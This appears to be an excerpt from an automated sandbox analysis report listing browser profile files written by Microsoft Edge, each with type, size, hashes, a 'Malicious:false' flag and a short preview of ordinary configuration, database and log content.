                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):1746
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.3024535722833015
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YcCpfgCzsXtslfcKsgleeIakEsRCgHCYhbj:F2fwGLkeIakFTnh/
                                                                                                                                                                                                                                                                                                                            MD5:00D5DFC8A9239B55338DE66051BFDE64
                                                                                                                                                                                                                                                                                                                            SHA1:75588FE67AFF093FC09D4DC85C77184DDF610923
                                                                                                                                                                                                                                                                                                                            SHA-256:30A13362F5237B45D15D4418848CD6714A68588BF79158C8C5F38790D0E80002
                                                                                                                                                                                                                                                                                                                            SHA-512:5908119D57C7D5C9BA7189283C6156AA0954E9DA1BF3986386FF71BD58934980D2719072E8D0A7E81E05C78DC1827DB46844167584AA78845A3F1601E9C5F833
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128357765559","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128360718357","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380629966283589","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.7429706785845666
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
                                                                                                                                                                                                                                                                                                                            MD5:E837EA6D04D8BF6E6EB3DE44A0D55B3B
                                                                                                                                                                                                                                                                                                                            SHA1:4B9760FAE3A4790477529EA827DFBAF077B626A6
                                                                                                                                                                                                                                                                                                                            SHA-256:9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
                                                                                                                                                                                                                                                                                                                            SHA-512:1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9767
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.115830386981659
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:stKkdwCsRxPaFvrE9klzws8JbV+FZBQAWUuPSYJ:stKisRxPCDnsbGvQI8
                                                                                                                                                                                                                                                                                                                            MD5:C81ABF84F706C820FCD4AEE149A2B343
                                                                                                                                                                                                                                                                                                                            SHA1:276886C46577805979D8C56994CEB48A900ED5BA
                                                                                                                                                                                                                                                                                                                            SHA-256:8A930B277D9EC34E882CDF04A5219C99951CFE85F5B618CCB7E3372A60FCB391
                                                                                                                                                                                                                                                                                                                            SHA-512:5F14830AA6D273180A779DBE9E36D593802A0881EE1886DAEEA220A4090122906B358F899E8E62B174F33F2314B2043ADFE82C3B092BC2BD7731C0F598E706DB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380536355952736","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9767
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.115830386981659
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:stKkdwCsRxPaFvrE9klzws8JbV+FZBQAWUuPSYJ:stKisRxPCDnsbGvQI8
                                                                                                                                                                                                                                                                                                                            MD5:C81ABF84F706C820FCD4AEE149A2B343
                                                                                                                                                                                                                                                                                                                            SHA1:276886C46577805979D8C56994CEB48A900ED5BA
                                                                                                                                                                                                                                                                                                                            SHA-256:8A930B277D9EC34E882CDF04A5219C99951CFE85F5B618CCB7E3372A60FCB391
                                                                                                                                                                                                                                                                                                                            SHA-512:5F14830AA6D273180A779DBE9E36D593802A0881EE1886DAEEA220A4090122906B358F899E8E62B174F33F2314B2043ADFE82C3B092BC2BD7731C0F598E706DB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380536355952736","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.566919002467983
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:nTffQHWjvW5wFZf4XS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPmWIY1w0rwXJpFtuc:n7YH+vWaFZf2Su1jajsWt1tT
                                                                                                                                                                                                                                                                                                                            MD5:ED02A1871812F1497C6C6F565964D481
                                                                                                                                                                                                                                                                                                                            SHA1:CFE4CD7190FBF2DA09DFEA9102802EC8672C6866
                                                                                                                                                                                                                                                                                                                            SHA-256:794FC618C5A7288315A5CD7601825846CB1C52790686F97A674D1F7647336BE4
                                                                                                                                                                                                                                                                                                                            SHA-512:BD29C1ED13BD9408115F318D7592DE8A69034AF4FDCAD660EE0214EFC6254F4F27202CBA479F6CC5E42BEC3D215E98CB00401823C5C84CC1619C315B9D9E4515
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380536355309336","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380536355309336","location":5,"ma
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):6354
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.3819566589661076
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:IJDpQ0Vy1a0VLq9Xp+9KiDD7Ll9iSr/thvxW:eDpQJq9Xp+YuLl9iSr1Zx
                                                                                                                                                                                                                                                                                                                            MD5:4BA2F16CE0388FFCB2CE86A9AFB8E2FE
                                                                                                                                                                                                                                                                                                                            SHA1:784C0C15C79839E1071E5167C8616B253CDD62A8
                                                                                                                                                                                                                                                                                                                            SHA-256:811A25688B8CCDC4895DCC8C3D3798CA6A339B64431D418060A6C091074B78D8
                                                                                                                                                                                                                                                                                                                            SHA-512:6367063B4065626C44E5EA013726B5B315B073959221709D907D47CBEA766D135E881A12027DEF04C5679E5E5A800CF00BB3D6D2B7C9451B23FC94F44070C086
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............P...b................next-map-id.1.Cnamespace-9e9e2fbf_fe50_472a_9f07_25eb1c16a1d4-https://ntp.msn.com/.0.<..z................map-0-shd_sweeper..{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.s.h.b.t.n.t.r.t.f.a.c.,.a.d.s.-.m.g.-.c.b.4.2.-.c.t.r.l.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.2.b.,.p.r.g.-.1.s.w.-.r.p.d.l.a.u.n.c.h.-.5.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.r.o.u.t.e.a.u.t.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.p.2.-.u.s.e.c.m.,.b.t.i.e.-.a.d.-.d.p.r.-.m.i.n.1.5.,.p.r.g.-.a.d.-.d.p.r.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.1.s.w.-.s.a.-.m.g.1.1.,.p.r.g.-.w.p.o.-.p.n.p.c.,.1.s.-.w.p.o.-.d.m.s.d.p.r.2.-.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.095427749956501
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHBAL+q2PN723oH+TcwtrQMxIFUttBM1ZmwDWuVlLVkwON723oH+TcwtrQMFLJ:7HvVaYebCFUtE1/6gz5OaYebtJ
                                                                                                                                                                                                                                                                                                                            MD5:52AF778453BCC1A10C4853BE0C8E700F
                                                                                                                                                                                                                                                                                                                            SHA1:BD4667599F33357BFDA5D6D5668A84F7C691F54E
                                                                                                                                                                                                                                                                                                                            SHA-256:6117490614122694ADC2EF029A64C33E80E48C460F54C3CF0D39E68F34BCDF61
                                                                                                                                                                                                                                                                                                                            SHA-512:1178B3E1EE7800ACAA3F8EF48BEE9C17E65F5F570C6AFE15865995D6BBF012D9885C2C25209533500424A4525C4262D4BCDCC657A75366A4C987473302D7AA56
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.256 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/05-02:39:16.258 1e58 Recovering log #3.2025/01/05-02:39:16.260 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1389
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.849938613140327
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:38tSL1dtNzTca/hoPwpsAF4unx69tLp3X2amEtG1Chq+bKJQKkOAM4t237:3q6ttTca6PwzFKXLp2FEkChl26HOpKC7
                                                                                                                                                                                                                                                                                                                            MD5:952DF25AD7BE380FB9E6C13BCA60BB21
                                                                                                                                                                                                                                                                                                                            SHA1:8A76334FD470D343DC83B1C09562BA84712A065D
                                                                                                                                                                                                                                                                                                                            SHA-256:97DA24247ADAB3D66F3CC044D410DDBB698763992D812D36A4FC33D1EFC585CA
                                                                                                                                                                                                                                                                                                                            SHA-512:D5842C5AB0A274C288EDCD18F2BD479BC71EA5F1D917625CF359C0DB7B555253483D0E7D6AA223EA4368B199CF7D8CAAD460F58C3CFBFC23624C5868D4F3CC0C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SNSS................................"........................................................!.............................................1..,.......$...9e9e2fbf_fe50_472a_9f07_25eb1c16a1d4.....................................5..0.......&...{46F3A197-DB49-410A-81B3-94975C835573}..............................................edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......gfM..*..hfM..*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... .......................................................P...$...2.2.6.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                            MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                            SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                            SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                            SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                            Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.121519279474945
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfiPt+q2PN723oH+Tcwt7Uh2ghZIFUttfiJUHZZmwDfiJUHNVkwON723oH+Tcz:7/3vVaYebIhHh2FUt9J/zD5OaYebIhHd
                                                                                                                                                                                                                                                                                                                            MD5:EE9AD12DA31C6F107D19DB424EB45573
                                                                                                                                                                                                                                                                                                                            SHA1:41E75A033E4BE01ABA2E9DD4C080E09FB95DD56F
                                                                                                                                                                                                                                                                                                                            SHA-256:24099A74E1B485E9BCB7F896233436F36A738655A38B17E769A696BF79A5C92F
                                                                                                                                                                                                                                                                                                                            SHA-512:AB16223C30E2F75DE60255AABE7BABE6418641B62B958FD78DBB0208D67A06DF8E60DD624B66953F864C607A78A8C0FC614A88D97E832E99F51FB70414AB58E3
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.360 1cf8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/05-02:39:15.361 1cf8 Recovering log #3.2025/01/05-02:39:15.361 1cf8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEXlfVj:/M/xT02zUl
                                                                                                                                                                                                                                                                                                                            MD5:66FBC171FFCBADD8B9FFB398A25EE06C
                                                                                                                                                                                                                                                                                                                            SHA1:B8CA6E537EE240D400CF7F389C4BC4C02A90803C
                                                                                                                                                                                                                                                                                                                            SHA-256:7BCAA88E6C212C4C88C1F64D822EC45859F1C53F5B59104F11813C5312986FBC
                                                                                                                                                                                                                                                                                                                            SHA-512:2D54698E820A229B0405F320CF37BCF00ECC0637BE7857AB102B9E6D42FE8B8D34336F5FB52FF4C05866C1AE057D0D1FEBC624CFFF76346F6E644BF4E6BC5537
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):438
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.228145048335997
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:7drvVaYebvqBQFUtvR1/phz5OaYebvqBvJ:7drVaYebvZgvFTOaYebvk
                                                                                                                                                                                                                                                                                                                            MD5:B851201AEF3ADD0CFBA8633D12893FC4
                                                                                                                                                                                                                                                                                                                            SHA1:FC2AF89074BF9EACBC788FCADEB8EB48F5A7984F
                                                                                                                                                                                                                                                                                                                            SHA-256:A1476606CA3D2DA5C2EBABCA9CC16B4A933A700E1F79DE4254FF531334D159A6
                                                                                                                                                                                                                                                                                                                            SHA-512:3CD152B001E5C3D717BC2FD2ED82F8E970BD0C040FB7F80EC077D35A1858B50A3FCF13E6F32959B37E2D9FB01AD19771819B393B8FE8C8F739B069E321FDA2A9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.324 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:39:16.327 1e58 Recovering log #3.2025/01/05-02:39:16.330 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
